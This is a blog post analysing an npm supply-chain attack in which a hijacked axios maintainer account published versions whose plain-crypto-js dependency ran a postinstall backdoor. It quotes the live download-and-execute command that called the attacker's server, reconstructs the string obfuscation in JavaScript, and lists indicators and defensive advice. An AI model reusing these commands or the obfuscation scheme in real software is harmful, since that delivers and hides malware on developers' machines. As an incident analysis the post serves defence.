Welcome to Transitive Dependency Hell
At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.
Monday Night
A developer sits down, opens a terminal, and runs a command they've run dozens of times before:
npx --yes @datadog/datadog-ci --help
A legitimate tool from a legitimate vendor. The --yes flag skips npm's confirmation prompt. The developer (or Claude) isn't even using the tool yet, just checking its options.
npm resolves the dependency tree and starts writing packages to disk: dogapi, escodegen, esprima, js-yaml, fast-xml-parser, rc, is-docker, semver, uuid, and axios. All names you'd recognize, and all packages that individually look fine. But axios just resolved to 1.14.1, which is not the version that Axios's maintainers published four days earlier. It's the version an attacker published twenty minutes ago.
The Hijack
The previous axios release was the last legitimate one, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of jasonsaayman, an existing Axios maintainer, and changed the account email from [email protected] to [email protected]. With publish access, they pushed two malicious versions in quick succession:
- 00:21:58 UTC: axios@1.14.1, tagged latest
- 01:00:57 UTC: a second backdoored release on the 0.x line, tagged legacy
The latest tag meant every unversioned axios install worldwide pulled the backdoor. The legacy tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: plain-crypto-js.
The Postinstall Chain
plain-crypto-js declared postinstall: node setup.js in its package.json, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with OrDeR_7077) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.
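The described scheme is simple enough to sketch. The snippet below is an illustrative reconstruction, not the actual setup.js: the layer ordering and framing are assumptions, and only the techniques (string reversal, base64, XOR) and the key OrDeR_7077 come from the analysis above.

```javascript
// Sketch of the two-layer string obfuscation described above (assumed layout).
// Layer 1: base64-encode and reverse. Layer 2: XOR with a repeating key.
const KEY = 'OrDeR_7077';

function xorWithKey(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) {
    out[i] = buf[i] ^ key.charCodeAt(i % key.length);
  }
  return out;
}

function obfuscate(plaintext) {
  // layer 1: base64-encode, then reverse the string
  const reversed = Buffer.from(plaintext, 'utf8')
    .toString('base64').split('').reverse().join('');
  // layer 2: XOR the reversed string with the key, emit hex
  return xorWithKey(Buffer.from(reversed, 'utf8'), KEY).toString('hex');
}

function deobfuscate(hex) {
  // undo layer 2: XOR is its own inverse
  const reversed = xorWithKey(Buffer.from(hex, 'hex'), KEY).toString('utf8');
  // undo layer 1: reverse back, then base64-decode
  const b64 = reversed.split('').reverse().join('');
  return Buffer.from(b64, 'base64').toString('utf8');
}

const blob = obfuscate('curl -s http://example.invalid/payload');
console.log(deobfuscate(blob)); // round-trips back to the original string
```

The point of layering is that neither the payload strings nor obvious base64 blobs appear in the file, so a grep for curl, osascript, or the C2 domain finds nothing.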
On the developer's Mac, CrowdStrike's process tree captured the full chain. npx spawned node setup.js, which shelled out to /bin/sh to launch osascript against a script dropped into the per-user temp directory:
nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
osascript is Apple's AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The nohup ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:
sh -c 'curl -o /Library/Caches/com.apple.act.mond \
  -d packages.npm.org/product0 \
  -s http://sfrclak.com:8000/6202033 \
  && chmod 770 /Library/Caches/com.apple.act.mond \
  && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \
  &> /dev/null
Download, set executable, and launch the beacon, all in a single sh -c invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.
The output path masquerades as an Apple system daemon using the com.apple.* reverse-DNS convention. The -d packages.npm.org/product0 is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The -s flag keeps curl silent, and the outer &> /dev/null swallows any output from the entire chain.
The binary immediately began beaconing to 142.11.206.73:8000 (sfrclak.com) over HTTP. Ten hours later, CrowdStrike's telemetry showed com.apple.act.mond still running and reading /Library/Preferences/com.apple.networkd.plist for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you're deciding whether a machine is worth keeping access to.
Meanwhile, back in node_modules, setup.js was cleaning up after itself. It deleted its own file with fs.unlink(filename) and renamed a clean package.md to package.json, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.
Not Just Macs
The same setup.js had branches for every major platform:
| Platform | Payload Path | Technique |
| --- | --- | --- |
| macOS | /Library/Caches/com.apple.act.mond | AppleScript, curl, binary masquerading as Apple daemon |
| Windows | %PROGRAMDATA%\wt.exe | PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops .ps1 payload with -w hidden -ep bypass |
| Linux | /tmp/ld.py | Python script downloaded and backgrounded with nohup python3 |
All three phoned home to the same C2: sfrclak.com:8000/6202033.
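As a rough sketch, the platform branch in setup.js probably reduced to a dispatch like the following. The dispatch code itself is an assumption; only the payload paths come from the analysis.

```javascript
// Hypothetical reconstruction of the per-platform payload path selection.
function payloadPathFor(platform, env = process.env) {
  switch (platform) {
    case 'darwin': // macOS: masquerade as an Apple daemon
      return '/Library/Caches/com.apple.act.mond';
    case 'win32':  // Windows: masquerade as Windows Terminal (wt.exe)
      return `${env.PROGRAMDATA || 'C:\\ProgramData'}\\wt.exe`;
    default:       // Linux and anything else: a world-readable temp path
      return '/tmp/ld.py';
  }
}
```

Node exposes the platform as process.platform, so one postinstall script covers every OS a developer might install on.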
What CrowdStrike Caught (and Didn't)
Falcon flagged the macOS beacon as MacOSApplicationLayerProtocol, mapping to T1071 (Application Layer Protocol) under TA0011 (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.
Everything before that ran unimpeded. The node setup.js postinstall hook, the osascript execution from a temp directory, the curl download and chmod all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.
IOCs
| Indicator | Type | Value |
| --- | --- | --- |
| C2 Domain | Domain | sfrclak.com |
| C2 IP | IPv4 | 142.11.206.73 |
| C2 Port | Port | 8000 |
| Campaign ID | String | 6202033 |
| macOS Payload | File | /Library/Caches/com.apple.act.mond |
| macOS Hash | SHA256 | 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a |
| Windows Payload | File | %PROGRAMDATA%\wt.exe |
| Linux Payload | File | /tmp/ld.py |
| Tracking ID | String | packages.npm.org/product0 |
| Compromised Packages | npm | axios@1.14.1, the backdoored 0.x legacy release, plain-crypto-js |
| Hijacked Account | npm | jasonsaayman (email changed to [email protected]) |
| XOR Key | String | OrDeR_7077 |
Takeaways
Check your lockfiles now. Search package-lock.json, yarn.lock, and pnpm-lock.yaml for axios@1.14.1, the backdoored 0.x legacy release, or any reference to plain-crypto-js. If you find them, assume the installing machine is compromised.
Disable postinstall scripts. Add ignore-scripts=true to ~/.npmrc. When a package legitimately needs a postinstall hook for native compilation, run npm rebuild explicitly after reviewing the script. This single setting would have stopped the entire attack chain.
Monitor for osascript spawned by node. There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.
The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm's default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every npm install into an implicit trust decision across hundreds of packages maintained by people you've never met. The Axios maintainer account was compromised for three hours. That was enough.
This is the third post in a series on software supply chain attacks. The previous posts covered the Trivy ecosystem compromise and the limits of SHA pinning. Joe Desimone's technical analysis of the axios compromise is worth reading in full.
If you liked (or hated) this blog, feel free to check out my GitHub!